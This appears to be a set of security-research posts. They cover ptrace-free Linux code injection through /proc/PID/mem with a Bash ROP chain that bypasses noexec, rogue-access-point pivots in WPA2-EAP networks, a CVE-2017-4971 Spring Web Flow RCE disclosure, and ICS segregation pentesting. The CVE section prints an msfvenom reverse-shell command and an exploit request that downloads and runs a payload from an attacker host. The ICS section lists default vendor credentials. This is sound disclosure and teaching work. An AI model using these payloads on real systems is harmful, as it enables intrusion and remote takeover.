
Linux based inter-process code injection without ptrace(2)

Using the default permission settings found in most major Linux distributions, it is possible for a user to inject code into a process they own without using ptrace. Because no special syscalls are required, the injection can be performed in a language as simple and ubiquitous as Bash, allowing execution of arbitrary native code when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload that executes a binary from memory.

The /proc filesystem on Linux offers introspection into the running state of the system. Each process has its own directory in this filesystem containing details about the process and its internals. Two pseudo-files of note in this directory are maps and mem. The maps file lists all the memory regions allocated to the binary and to each loaded dynamic library. This information is relatively sensitive, as the offset of each library is randomised by ASLR. The mem file provides a sparse mapping of the full memory space of the process. Combined with the offsets obtained from the maps file, mem can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error is returned, since this is equivalent to accessing unallocated memory.

The read/write permissions on these files are determined by the ptrace_scope setting in /proc/sys/kernel/yama, assuming no other restrictive access controls (such as SELinux or AppArmor) are in place. The Linux kernel documents the possible values for this setting. For the purposes of this injection, they form two pairs. The lower-security settings, 0 and 1, allow any process running under the same uid, or only the parent process, respectively, to write to a process's /proc/${PID}/mem file. Either setting allows this code injection. The more secure settings, 2 and 3, restrict access to admin-only or block it completely, respectively. Most major distributions were found to be configured with 1 by default, allowing only the parent of a process to write into its /proc/${PID}/mem file.

This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process:

$ grep stack /proc/self/maps
7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0                          [stack]

Among other things, the stack contains the return address (on architectures that, unlike ARM, do not store the return address in a 'link register'), so a function knows where to continue execution when it completes. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as return-oriented programming (ROP) is used to take control of the targeted process. This technique replaces the original return address with an attacker-controlled one, allowing the attacker to call custom functions or syscalls by controlling execution flow each time a ret instruction is executed.

This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem.

The method therefore uses the /proc/${PID}/maps file to find the random ASLR offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in a predictable state when we overwrite the stack, we use the sleep command as the slave process to be overwritten. The sleep command uses the nanosleep syscall internally, which means it sits inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack before the syscall returns, at which point our manufactured chain of ROP gadgets takes control. Since we cannot know the exact position of the stack pointer at the moment the syscall returns, we prefix our payload with a NOP sled; the stack pointer can then land almost anywhere within the sled, and on return execution simply walks up the stack until it reaches our payload.

A general purpose implementation for code injection can be found at the link below. Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies is:

  • GNU grep (Must support -Fao --byte-offset)
  • dd (required for reading/writing to an absolute offset into a file)
  • Bash (for the math and other advanced scripting features)

The general flow of this script is as follows:

Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated.

Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries.

Once we have confirmed all gadgets can be available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We now re-find the gadgets in the libraries, and we relocate them to the correct ASLR base, so we know their location in the memory space of the target region, rather than just the binary on disk. As above, we verify that the gadget is in an executable memory region before we commit to using it.

The list of gadgets we require is relatively short. We need a NOP for the NOP sled discussed above, enough POP gadgets to fill all registers required for a function call, a gadget for invoking a syscall, and a gadget for calling a standard function. This combination allows us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo-instructions from our payload description file into a ROP payload. For example, on a 64-bit system, the line 'syscall 60 0' converts to ROP gadgets that load 60 into the RAX register and 0 into RDI, followed by a syscall gadget. This results in 40 bytes of data: three addresses and two constants, each 8 bytes. This syscall, when executed, would call exit(0).
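As a sketch of this serialisation step (the gadget addresses below are hypothetical placeholders; the real script relocates gadgets found via /proc/${PID}/maps), the 'syscall 60 0' line could be packed into its 40-byte little-endian form like so:

```shell
#!/bin/bash
# Sketch: serialise the pseudo-instruction 'syscall 60 0' into its 40-byte
# ROP form. The gadget addresses are made-up placeholders for illustration.
le64() {                      # emit a 64-bit value as 8 little-endian bytes
  local v=$1 i
  for ((i = 0; i < 8; i++)); do
    printf "\\$(printf '%03o' $((v & 0xff)))"
    v=$((v >> 8))
  done
}
POP_RAX=0x7f0000001111        # address of 'pop rax; ret' (hypothetical)
POP_RDI=0x7f0000002222        # address of 'pop rdi; ret' (hypothetical)
SYSCALL=0x7f0000003333        # address of 'syscall' gadget (hypothetical)
{ le64 $POP_RAX; le64 60; le64 $POP_RDI; le64 0; le64 $SYSCALL; } > /tmp/rop.bin
wc -c < /tmp/rop.bin          # 3 addresses + 2 constants, 8 bytes each
```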

We can also call functions present in the PLT, which includes functions imported from external libraries, such as glibc. To locate the offsets for these functions, as they are called by pointer rather than syscall number, we need to first parse the ELF section headers in the target library to find the function offset. Once we have the offset we can relocate these as with the gadgets, and add them to our payload.

String arguments are also handled: since we know the location of the stack in memory, we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** argument array. We can generate the array of pointers inside our payload before injection, and upon execution the pointer to that array on the stack can be used like any normal stack-allocated char**.

Once the payload has been fully serialised, we can overwrite the stack inside the process using dd and the stack offset obtained from the /proc/${PID}/maps file. To avoid permissions issues, the injection script must end with an 'exec dd' line: this replaces the bash process with the dd process, transferring parenthood of the sleep process from bash to dd.

After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed.

The specific payload injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload is a simple open/memfd_create/sendfile/fexecve program. This dissociates the target binary from the noexec mount flag of the filesystem: the binary is executed from memory, bypassing the restriction. Since the sleep binary is backgrounded by bash on execution, it is not possible to interact with the executed binary, as it has no parent after dd exits. To work around this restriction, it is possible to use one of the examples shipped with the libfuse distribution, assuming FUSE is present on the target system: the passthrough binary creates a mirrored mount of the root filesystem at the destination directory. This new mount is not mounted noexec, and it is therefore possible to browse through it to a binary, which will then be executable.
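As an illustration only, in the pseudo-instruction style of the 'syscall 60 0' example above (the exact description-file syntax for string and descriptor arguments is the script's own and may differ; the x86-64 syscall numbers are open = 2, memfd_create = 319, sendfile = 40, and execveat = 322, glibc's fexecve being implemented via execveat):

```
# Hypothetical sketch of the noexec-bypass payload; markers like <path>
# stand in for pointers into the string area appended to the payload.
syscall 2    <path> 0                 # open(path, O_RDONLY)            -> src fd
syscall 319  <name> 1                 # memfd_create(name, MFD_CLOEXEC) -> mem fd
syscall 40   memfd src 0 <size>       # sendfile(memfd, src, NULL, size)
syscall 322  memfd <""> <argv> <envp> 0x1000   # execveat(..., AT_EMPTY_PATH)
```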

A proof of concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell.

Future work:

To speed up execution, it would be useful to cache each gadget's offset from its respective ASLR base between the preload and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not always appropriate. Alternatives include rearchitecting the script to execute the payload script in the same environment as the main bash process, rather than in a child executed using $(). This would allow environment variables to be shared bidirectionally.

Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code.

The obvious mitigation strategy for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that would block this technique, whilst not completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in use. This value can be set by adding the following line to /etc/sysctl.conf:
kernel.yama.ptrace_scope = 2


Other mitigation strategies include combinations of seccomp, SELinux, or AppArmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem.

The proof of concept code, and Bash ROP generator can be found at


Whitepaper: The Black Art of Wireless Post-Exploitation - Bypassing Port-Based Access Controls Using Indirect Wireless Pivots

At DEF CON 25 we introduced a novel attack that can be used to bypass port-based access controls in WPA2-EAP networks. We call this technique an Indirect Wireless Pivot. The attack, which affects networks implemented using EAP-PEAP or EAP-TTLS, takes advantage of the fact that port-based access control mechanisms rely on the assumption that the physical layer can be trusted. Just as a NAC cannot effectively protect network endpoints if the attacker has physical access to a switch, a NAC can also be bypassed if the attacker can freely control the physical layer using rogue access point attacks. The fact that this technique is possible invalidates some common assumptions about wireless security. Specifically, it demonstrates that port-based NAC mechanisms do not effectively mitigate the risk presented by weak WPA2-EAP implementations. 

While creating the Indirect Wireless Pivot, we also developed a second technique that we call the Hostile Portal Attack. This second technique can be used to perform SMB Relay attacks and harvest Active Directory credentials without direct network access. Both techniques are briefly described below, and in greater detail in the attached PowerPoint slides and whitepaper.

Hostile Portal Attacks

This is a weaponization of the captive portals typically used to restrict access to open networks in environments such as hotels and coffee shops. Instead of redirecting HTTP traffic to a login page, the hostile portal redirects traffic to an SMB share located on the attacker's machine. The result is that after the victim is forced to associate with the attacker using a rogue access point attack, any HTTP traffic generated by the victim will cause the victim's machine to attempt NTLM authentication with the attacker. The attacker also performs an LLMNR/NBT-NS poisoning attack against the victim.
The Hostile Portal attack gets you results that are similar to what you’d expect from LLMNR/NBT-NS poisoning, with some distinct advantages:
  • Stealthy: No direct network access is required
  • Large Area of Effect: Works across multiple subnets – you get everything that is connected to the wireless network
  • Efficient: This is an active attack that forces clients to authenticate with you. The attacker does not have to wait for a network event to occur, as with LLMNR/NBT-NS poisoning. 

Indirect Wireless Pivots

The Indirect Wireless Pivot is a technique for bypassing port-based access control mechanisms using rogue access point attacks. The attacker first uses a rogue AP attack to coerce one or more victims into connecting. A Hostile Portal Attack is then combined with an SMB Relay attack to place a timed payload on the client. The rogue access point is then terminated, allowing the client to reassociate with the target network. After a delay, the payload will execute, causing the client to send a reverse shell back to the attacker’s first interface. Alternatively, this attack can be used to place an implant on the client device.

PowerPoint Slides and Whitepaper:

For an in-depth look at both of these attacks, check out the PowerPoint slides and whitepaper on the subject.

PowerPoint Slides:



CVE-2017-4971: Remote Code Execution Vulnerability in the Spring Web Flow Framework

Earlier this year, we approached Pivotal with a vulnerability disclosure relating to the Spring Web Flow framework: an unvalidated data-binding SpEL expression makes applications built using the framework vulnerable to remote code execution (RCE) attacks if configured with default values. This vulnerability was recently made public on Pivotal's blog.

This post will explain in detail where this vulnerability was identified, using actual code samples, along with possible mitigations and details of the vendor fix. Pivotal has rated this as a medium-severity issue; however, as is often the case, in a specific context this issue could be far more significant.

Spring Web Flow is a subproject of the Spring framework and provides several components for implementing MVC web applications with integrated flow definition and management. The flows and MVC views can be configured using XML configuration files. The generated servlet/portlet view objects are vulnerable to remote code execution (RCE) attacks if configured with default values.

Proof-of-concept exploitation was performed on the following sample web application:


Analysing the framework, it was possible to identify the two conditions that are required for the generated web application to be vulnerable to RCE. These conditions are as follows:

  1. The useSpringBeanBinding parameter in the MvcViewFactoryCreator object needs to be set to false (its default value):

    spring-webflow/spring-webflow/src/main/java/org/springframework/
    129:   /**
    130:    * Sets whether to use data binding with Spring's {@link BeanWrapper} should be enabled. Set to 'true' to enable.
    131:    * 'false', disabled, is the default. With this enabled, the same binding system used by Spring MVC 2.x is also used
    132:    * in a Web Flow environment.
    133:    * @param useSpringBeanBinding the Spring bean binding flag
    134:    */
    135:  public void setUseSpringBeanBinding(boolean useSpringBeanBinding) {
    136:          this.useSpringBeanBinding = useSpringBeanBinding;
    137:   }

  2. A null BinderConfiguration object needs to be mapped in a view object.

These two conditions can be better analysed in the context of the web application example: spring-webflow-samples/booking-mvc.

  1. The useSpringBeanBinding parameter is set to true in the sample, which is not the default value; commenting out the following configuration line restores the default:

    spring-webflow-samples/booking-mvc/src/main/java/org/springframework/
    46:  @Bean
    47:  public MvcViewFactoryCreator mvcViewFactoryCreator() {
    48:         MvcViewFactoryCreator factoryCreator = new MvcViewFactoryCreator();
    49:         factoryCreator.setViewResolvers(Arrays.<ViewResolver>asList(this.webMvcConfig.tilesViewResolver()));
    50:         factoryCreator.setUseSpringBeanBinding(true);
    51:         return factoryCreator;
    52:  }

  2. The BinderConfiguration object for the view "reviewBooking" is not configured, and will therefore be null:

    spring-webflow-samples/booking-mvc/src/main/webapp/WEB-INF/
    16:  <view-state id="enterBookingDetails" model="booking">
    17:         <binder>
    18:                <binding property="checkinDate" />
    19:                <binding property="checkoutDate" />
    20:                <binding property="beds" />
    21:                <binding property="smoking" />
    22:                <binding property="creditCard" />
    23:                <binding property="creditCardName" />
    24:                <binding property="creditCardExpiryMonth" />
    25:                <binding property="creditCardExpiryYear" />
    26:                <binding property="amenities" />
    27:         </binder>
    28:         <on-render>
    29:                <render fragments="body" />
    30:         </on-render>
    31:         <transition on="proceed" to="reviewBooking" />
    32:         <transition on="cancel" to="cancel" bind="false" />
    33:  </view-state>
    35:  <view-state id="reviewBooking" model="booking">
    36:         <on-render>
    37:                <render fragments="body" />
    38:         </on-render>
    39:         <transition on="confirm" to="bookingConfirmed">
    40:                <evaluate expression="bookingService.persistBooking(booking)" />
    41:         </transition>
    42:         <transition on="revise" to="enterBookingDetails" />
    43:         <transition on="cancel" to="cancel" />
    44:  </view-state>

When these two conditions are met, any MVC view object that extends the AbstractMvcView abstract class is vulnerable to RCE, as detailed below.

62: /**
63:  * Base view implementation for the Spring Web MVC Servlet and Spring Web MVC Portlet frameworks.
64:  *
65:  * @author Keith Donald
66:  */
67: public abstract class AbstractMvcView implements View {

The View object starts to process a user event when an HTTP request is received.

210:   public void processUserEvent() {
211:     String eventId = getEventId();
212:     if (eventId == null) {
213:            return;
214:     }
215:     if (logger.isDebugEnabled()) {
216:            logger.debug("Processing user event '" + eventId + "'");
217:     }
218:     Object model = getModelObject();
219:     if (model != null) {
220:            if (logger.isDebugEnabled()) {
221:                   logger.debug("Resolved model " + model);
222:            }
223:            TransitionDefinition transition = requestContext.getMatchingTransition(eventId);
224:            if (shouldBind(model, transition)) {
225:                   mappingResults = bind(model);
226:                   if (hasErrors(mappingResults)) {
227:                          if (logger.isDebugEnabled()) {
228:                                 logger.debug("Model binding resulted in errors; adding error messages to context");
229:                          }
230:                          addErrorMessages(mappingResults);
231:                   }
232:                   if (shouldValidate(model, transition)) {
233:                          validate(model, transition);
234:                   }
235:            }
236:     } else {
237:            if (logger.isDebugEnabled()) {
238:                   logger.debug("No model to bind to; done processing user event");
239:            }
240:     }
241:     userEventProcessed = true;
242:   }

When the binding process between the input HTTP parameters and the current model starts, if a BinderConfiguration is not present the addDefaultMappings method will be called.

380:   protected MappingResults bind(Object model) {
381:     if (logger.isDebugEnabled()) {
382:            logger.debug("Binding to model");
383:     }
384:     DefaultMapper mapper = new DefaultMapper();
385:     ParameterMap requestParameters = requestContext.getRequestParameters();
386:     if (binderConfiguration != null) {
387:            addModelBindings(mapper, requestParameters.asMap().keySet(), model);
388:     } else {
389:            addDefaultMappings(mapper, requestParameters.asMap().keySet(), model);
390:     }
391:     return mapper.map(requestParameters, model);
392:   }

If the input parameter starts with the fieldMarkerPrefix string, in this case “_”, the addEmptyValueMapping method will be invoked.

462:   protected void addDefaultMappings(DefaultMapper mapper, Set<String> parameterNames, Object model) {
463:     for (String parameterName : parameterNames) {
464:            if (fieldMarkerPrefix != null && parameterName.startsWith(fieldMarkerPrefix)) {
465:                   String field = parameterName.substring(fieldMarkerPrefix.length());
466:                   if (!parameterNames.contains(field)) {
467:                          addEmptyValueMapping(mapper, field, model);
468:                   }
469:            } else {
470:                   addDefaultMapping(mapper, parameterName, model);
471:            }
472:     }
473:   }

If the useSpringBeanBinding parameter is set to false, the expressionParser will be instantiated as a SpelExpressionParser rather than a BeanWrapperExpressionParser, and will therefore produce SpelExpression objects instead of BeanWrapperExpression objects. The SpelExpression object will evaluate the expression when the getValueType method is called.

483:   protected void addEmptyValueMapping(DefaultMapper mapper, String field, Object model) {
484:     ParserContext parserContext = new FluentParserContext().evaluate(model.getClass());
485:     Expression target = expressionParser.parseExpression(field, parserContext);
486:     try {
487:            Class<?> propertyType = target.getValueType(model);
488:            Expression source = new StaticExpression(getEmptyValue(propertyType));
489:            DefaultMapping mapping = new DefaultMapping(source, target);
490:            if (logger.isDebugEnabled()) {
491:                   logger.debug("Adding empty value mapping for parameter '" + field + "'");
492:            }
493:            mapper.addMapping(mapping);
494:     } catch (EvaluationException e) {
495:     }
496:   }


The following proof-of-concept exploitation has been tested on the example web application spring-webflow-samples/booking-mvc. To perform the test against the default configuration values, the following line of code was commented out.

46:  @Bean
47:  public MvcViewFactoryCreator mvcViewFactoryCreator() {
48:         MvcViewFactoryCreator factoryCreator = new MvcViewFactoryCreator();
49:         factoryCreator.setViewResolvers(Arrays.<ViewResolver>asList(this.webMvcConfig.tilesViewResolver()));
50:         //factoryCreator.setUseSpringBeanBinding(true);
51:       return factoryCreator;
52:  }

A reverse bash shell payload has been created for the following proof-of-concept.

msfvenom -p cmd/unix/reverse_bash LHOST=[REDACTED].209 LPORT=4444 -f raw -o ./1


After deploying the example web application on an Ubuntu instance on the host [REDACTED].230, it was possible to access the application and start the hotel booking flow. When the application asks to confirm your details, it is possible to send a request similar to the one shown below to execute malicious code on the server's host operating system.

HTTP request:

POST /booking-mvc/hotels/booking?execution=e1s2 HTTP/1.1
Host: [REDACTED].230:8080
Content-Length: 189
Cache-Control: max-age=0
Origin: http://[REDACTED].230:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://[REDACTED].230:8080/booking-mvc/hotels/booking?execution=e1s2
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=1EA503C091D58D37FB0446EE59CFAF38
DNT: 1
Connection: close

_eventId_confirm=&_csrf=5e3e68b1-884c-47c9-8a4c-6c28f35bdffe&_new java.lang.ProcessBuilder({'/bin/bash','-c','wget http://[REDACTED].209:8000/1 -O /tmp/1; chmod 700 /tmp/1; /tmp/1'}).start()=

HTTP response:

HTTP/1.1 500
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-store
X-Frame-Options: DENY
Content-Type: text/html;charset=utf-8
Content-Language: en
Date: Mon, 05 Jun 2017 13:27:09 GMT
Connection: close
Content-Length: 10873

<!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Handler dispatch failed; nested exception is java.lang.IllegalAccessError</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.springframework.web.util.NestedServletException: Handler dispatch failed; nested exception is java.lang.IllegalAccessError


The application returns an IllegalAccessError exception; however, the payload has been executed, as shown in the screenshot below.


The Spring Web Flow team released a patch on May 31st resolving the reported vulnerability. Replacing the default expressionParser object with a BeanWrapperExpressionParser instance mitigates the vulnerability, since the latter parser produces BeanWrapperExpression objects which, according to the Spring documentation, prevent method invocation:

“Note that Spring’s BeanWrapper is not a full-blown EL implementation: it only supports property access, and does not support method invocation, arithmetic operations, or logic operations.” [1]

import org.springframework.binding.expression.Expression;
import org.springframework.binding.expression.ExpressionParser;
import org.springframework.binding.expression.ParserContext;
+import org.springframework.binding.expression.beanwrapper.BeanWrapperExpressionParser;
import org.springframework.binding.mapping.MappingResult;

@@ -78,6 +79,8 @@
private ExpressionParser expressionParser;
+ private final ExpressionParser emptyValueExpressionParser = new BeanWrapperExpressionParser();
private ConversionService conversionService;
private Validator validator;

@@ -482,7 +485,7 @@ protected void addDefaultMappings(DefaultMapper mapper, Set<String> parameterNam
protected void addEmptyValueMapping(DefaultMapper mapper, String field, Object model) {
ParserContext parserContext = new FluentParserContext().evaluate(model.getClass());
- Expression target = expressionParser.parseExpression(field, parserContext);
+ Expression target = emptyValueExpressionParser.parseExpression(field, parserContext);
try {
Class<?> propertyType = target.getValueType(model);
Expression source = new StaticExpression(getEmptyValue(propertyType));




ICS/SCADA Systems for Penetration Testers: A Typical Engagement

It’s no secret that the devices that comprise process control systems are generally vulnerable to attack. This point has been made through endless research and has even been the subject of countless talks and trainings. Unfortunately, the personnel responsible for securing these networks often face significant challenges, most notably the difficulty in ensuring that devices and systems are configured securely and regularly patched without interrupting the process. In addition to this, security personnel often struggle in vain to sell the idea of security to the people in charge of the process who sometimes view security as more of an unnecessary burden, especially at lower layers of the process control network. In response to this, most of the focus has been placed on network segregation and establishing secure enclaves for sensitive process control systems. In this way, more effort can be placed on securing the barriers between the corporate network and SCADA / process control networks and enforcing tight access controls. In turn, many of the process control system assessments we’ve worked on have been almost entirely focused on determining the adequacy of network segregation efforts.

In spite of the importance of properly implemented network segregation and the interest in segregation testing, there is not much information available on how to perform these assessments. This blog post details some of the common gaps in network segmentation that we have seen during previous assessments. Hopefully, this information will help penetration testers who are looking to get into process control system assessments, as well as give process security personnel an idea of what attackers look for when trying to gain access to lower layers of the process control network from the corporate network.

As a general rule, network segregation assessments are performed from the perspective of an attacker who has already compromised the corporate network, in order to mimic real-world attack scenarios. Typically, this means either being granted domain administrator access or performing the segregation assessment in conjunction with a penetration test of the corporate network.

The network segregation testing process typically follows the procedure outlined below:

  • Information Gathering
  • Entry point Identification
  • Segregated Network Access

Information Gathering

The process of information gathering centers around identifying any unprotected process control network-related information on the corporate network. This information can reveal intricate details about the process control network that can help an attacker gain access. Typically, this includes the following:

  • Process-Related Personnel – Key people such as process engineers, operators, and process IT personnel are usually privy to a great deal of sensitive information related to the process control network. Searching Active Directory for employees that fall under the aforementioned roles can help to identify their workstation hostnames as well as any network shares they may have access to. This can help narrow down the information gathering process and reduce the overall amount of effort required to gain access to the process control network since focus can be placed on those hosts and shares.
  • Network Diagrams and Design Documentation – This information can help an attacker understand the process control network at a fundamental level and provide hostnames and IP addresses that can serve as the basis for further information gathering. Moreover, network documentation may give an attacker a clear picture of the process control network, aiding them in deciding which hosts to attack. After identifying corporate network file servers and information repositories like SharePoint, network documentation can typically be found by searching for VSD, PDF, and DOC / DOCX files in directories or shares related to process IT.
  • Process Control Network Documentation – This can include details on official remote access procedures, instructions on how to login to process-related hosts, and information on the technology in use (both operational and non-operational). In many cases, extremely sensitive information such as usernames and passwords are included in this documentation, making it invaluable on a segregation assessment. This documentation can also be found in process IT shares and directories as well as occasionally inside of process-related shares and directories.
  • Network Device and System Backups – Firewall, router, and switch configuration files that are backed up on the corporate network can often serve as a road map for identifying a path to gain access to the process control network. Reviewing network device configurations can reveal which hosts on the corporate network are permitted access through remote access protocols such as RDP, VNC, or SSH. If backups of systems on the process control network can be found on the corporate network, they can be easily analyzed to extract password hashes and other sensitive data. This information can often be retrieved from IT management or network backup software as well as corporate and process IT network shares.
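Much of this document hunt can be scripted. Below is a minimal sketch, assuming the relevant share has been mounted locally; the extension and keyword lists are illustrative and should be tuned per engagement:

```python
import os

# Hypothetical extension and keyword lists -- tune these to the target
# environment and the naming habits observed during reconnaissance.
DOC_EXTENSIONS = {".vsd", ".pdf", ".doc", ".docx"}
KEYWORDS = ("scada", "dcs", "plc", "hmi", "process", "historian", "pcn")

def find_candidate_docs(share_root):
    """Walk a mounted share and flag documents whose path or filename
    suggests process-control-network content."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(share_root):
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            if ext not in DOC_EXTENSIONS:
                continue
            full_path = os.path.join(dirpath, name)
            if any(k in full_path.lower() for k in KEYWORDS):
                hits.append(full_path)
    return hits
```

Matching on the full path (not just the filename) catches documents stored under directories like "Process IT" even when the filenames themselves are generic.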

Entry Point Identification

One of the key pieces of information that should be obtained from the information gathering phase is the existence of any entry points into the process control network from the corporate network. Process control networks are rarely completely air gapped because they may be located in remote or unfavorable working environments. As a result, remote access is a popular solution for managing devices and systems in the process control network. The following entry points can be found in most situations:

  • Jump Box / Terminal Server – Access to the process control network from the corporate network is often permitted through a host that serves as a jump box. Usually a remote access protocol such as RDP, VNC, or SSH is used, although desktop virtualization software such as Citrix is occasionally employed instead. More security-conscious organizations tend to use remote access solutions that support multi-factor authentication.
    Official procedures for remote access to the process control network can usually be found in documentation. Jump boxes or terminal services can also be identified from analyzing network diagrams or firewall configuration files for hosts that permit connections from the corporate network over typical remote access ports. Observation of process-related personnel’s corporate network workstations can oftentimes be an effective means of identifying the jump box and remote access protocol in use.
  • VPN Access – Select users, usually process-related personnel, can be granted VPN access directly into the process control network for remote management purposes. Similarly to remote access through jump boxes, multi-factor authentication may be employed to help thwart attacks against the process control network.
    These users can sometimes be identified by an AD group created specifically for VPN users. Looking at the names and descriptions of groups where key process-related personnel are members is usually an effective means of identifying the process VPN group. Workstations of users in the process VPN group should be investigated for VPN interfaces or software as well as active connections into the process control network. These workstations can effectively be used as a bridge into the process control network.
  • Dual-Homed Hosts – In a typical process control network, several hosts on the corporate network may be configured as either dual-homed or with extensive firewall rules that permit access into the process control network. Historian servers often fall under this category, due to the need to use process data for performance monitoring and improvement purposes on the corporate network. Gaining access to these hosts can often provide direct access into the process control network without having to use official remote access procedures. Even if historians are not provided extensive access into the process control network, observing their active network connections can reveal target IP address ranges.

The most reliable way to identify historians is to analyze network documentation and diagrams. Barring this, it’s not uncommon to find them by analyzing server hostnames (“HI”, “HIS”, or “HIST” are pretty widely-used naming conventions, for example). They may also be found through port scanning, although this can be a difficult task given that there is little port standardization between vendors. However, many organizations with process control networks use OSISoft PI servers as historians, which can sometimes be identified by scanning for ports that are commonly associated with the software. In general, if the process control system vendor is known or discovered through reconnaissance, publicly-available vendor documentation should be researched for commonly-used ports to scan for on the corporate network.
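The hostname-convention check lends itself to a quick script. A sketch, assuming a hostname list has already been exported from Active Directory or DNS; the separator logic simply reduces false positives such as "HISTORY-SRV":

```python
import re

# "HI"/"HIS"/"HIST" naming conventions mentioned above. Requiring a
# separator or digit around the token filters out words like "HISTORY".
HISTORIAN_RE = re.compile(r"(?:^|[-_])(?:HIST|HIS|HI)(?:[-_0-9]|$)", re.IGNORECASE)

def likely_historians(hostnames):
    """Return hostnames that match common historian naming conventions."""
    return [h for h in hostnames if HISTORIAN_RE.search(h)]
```

Candidates flagged this way are a starting point for targeted port scanning, not proof; a plant's actual conventions should be confirmed against network documentation.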

Another effective method of discovering dual-homed hosts is sweeping across the corporate network using some form of remote command execution, such as WMI or PsExec, and extracting active network connections, network interfaces, and routing tables. This data can then be searched for any hosts that appear to have access to the process control network. However, this method is noisy, time-consuming, and can produce an excessive amount of information to parse through, especially on larger networks. Additionally, the IP address ranges used by the target process control network would have to be known in order to make this technique feasible.
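Once interface and routing data has been collected, triaging it is straightforward to script. A sketch using Python's ipaddress module; the PCN range shown is a placeholder for whatever ranges reconnaissance actually turns up:

```python
import ipaddress

# Hypothetical PCN range -- real values come from diagrams, firewall
# configurations, or historian connection observations.
PCN_RANGES = [ipaddress.ip_network("192.168.100.0/24")]

def flags_pcn_access(interface_addrs):
    """Given IP addresses harvested from a host's interfaces (e.g. via
    WMI), return those falling inside a suspected process control range."""
    hits = []
    for addr in interface_addrs:
        ip = ipaddress.ip_address(addr)
        if any(ip in net for net in PCN_RANGES):
            hits.append(addr)
    return hits
```

Any corporate host with an address in a suspected range is a dual-homed candidate worth investigating directly.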

Segregated Network Access

With a list of potential entry points into the process control network, the next step is to investigate each entry point to determine how it might be possible to leverage common security issues in order to gain access to the process control network. The following issues are typically observed when conducting process control network segmentation tests:

  • Insecure Password Practices – Passwords are a significant issue for personnel put in charge of managing the security of process control networks for multiple reasons. Most notably, it is difficult to encourage engineers and other users with access to the process control network to engage in secure password practices. Password reuse between the corporate network and process control network is extremely common since users are typically unwilling to manage multiple sets of credentials and feel that the risk of an attacker gaining access is small. After compromising the corporate network, the passwords for key process-related personnel should be cracked or obtained so they can be used for logon attempts on process control network entry points.

    Default or weak credentials are also very common. This is usually because these passwords are set by default as part of the vendor’s provided solution and never changed in order to avoid issues with deviating from the vendor’s default configuration. Oftentimes usernames and passwords will be the same (operator : operator, manager : manager, supervisor : supervisor are common examples) or some variation of the vendor’s name (Administrator : siemens as another example).

    To make matters worse, password lockout policies on operational technology are usually lax. The reasoning for this is to prevent accidental lockouts from causing issues with the process, which is generally a good idea. However, this provides attackers a lot of leeway for brute forcing credentials. This issue, combined with the prevalence of default, weak, or shared credentials, makes password guessing attacks extremely viable for gaining access to the process control network.
  • Process Control Network Credentials Stored in Plaintext – Credentials for operational technology are often included in documentation. Any repositories for process control network documentation should have been enumerated as part of the information gathering phase of a segmentation assessment. Any documentation found in these repositories should be searched for passwords that can be used on entry-points.
